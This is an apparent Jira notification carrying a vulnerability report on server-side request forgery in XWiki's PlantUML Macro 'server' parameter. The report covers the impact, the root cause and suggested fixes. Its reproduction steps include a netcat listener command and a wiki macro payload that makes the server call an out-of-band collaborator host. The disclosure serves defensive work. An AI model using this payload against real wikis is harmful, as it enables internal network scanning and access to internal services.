There are 2 updates.
 
 
PlantUML Macro / cid:jira-generated-image-avatar-97298446-c443-4a96-9e97-bd3a860e500a PLANTUML-25 Open

Server-Side Request Forgery (SSRF) in PlantUML Macro via 'server' parameter
 
View issue   ·   Add comment
 

2 updates

 
cid:jira-generated-image-avatar-a4bef4dc-e6f2-409c-b53b-824144195b67 Changes by Łukasz Rybak on 26/Nov/25 06:55
 
Description: *Impact*

 The PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the {{server}} parameter.

However, the application does not validate the supplied URL. An attacker can supply an internal IP address (e.g., localhost, internal network services)   or a malicious external URL. The XWiki server will attempt to connect to this URL to "render" the diagram.
This allows an attacker to:
# *Scan internal network ports* (by observing response times or error messages).

# *Access internal HTTP services* masquerading as the XWiki server.

# *Leak IP addresses* to external servers (OOB interaction).

 h3. Technical Analysis PoC

*Vulnerable Component:* PlantUML Macro *Vulnerable Parameter:* {{server=" 1 . .."}}

*Root Cause:* The macro code accepts the user-supplied {{server}} string and uses it to construct an HTTP request to fetch the generated image, without ensuring the target is a permitted public PlantUML service.
h3. Reproduction Steps & Proof of Concept

 
# *Setup:* Use an OAST service (like Burp Collaborator) or a local listener ({{{}nc -lvp 4444{}}}) to capture the interaction.

 # *Exploit Injection:* 2.  Create a wiki page with the following content:
 
{{{{{}plantuml server="http://oqiusawt5ny84yw017u6qgnay14ssmgb.oastify.com"{}}}
@startuml
A -> B: SSRF Test
@enduml
{{{}/plantuml{}}}}}
!image-2025-11- 25 26 - 20 06 - 31 54 - 00 50 - 469 628 .png!

 # *Execution:* 2. Save and View the page.
!image-2025-11-25-20-31-57-213.png!

 # *Observation:* 3. The XWiki server initiates an HTTP connection to the specified target.

!image-2025-11-25-20-32-25-311.png!
h3. Patches

The {{server}} parameter should be either:

Removed (forcing the use of the globally configured PlantUML server).

Validated against a strict allowlist of trusted domains defined in {{{}xwiki.properties{}}}.

Restricted to prevent access to private IP ranges (RFC 1918) and loopback addresses.

 
h3. Attribution

  

 Reported by: Łukasz Rybak GitHub: [https://github.com/lukasz-rybak]
Attachment: image-2025-11-26-06-54-50-628.png
 
 
This message was sent by Atlassian Jira (v9.3.0#930000-sha1:287aeb6) Atlassian logo
If image attachments aren't displayed, see this article.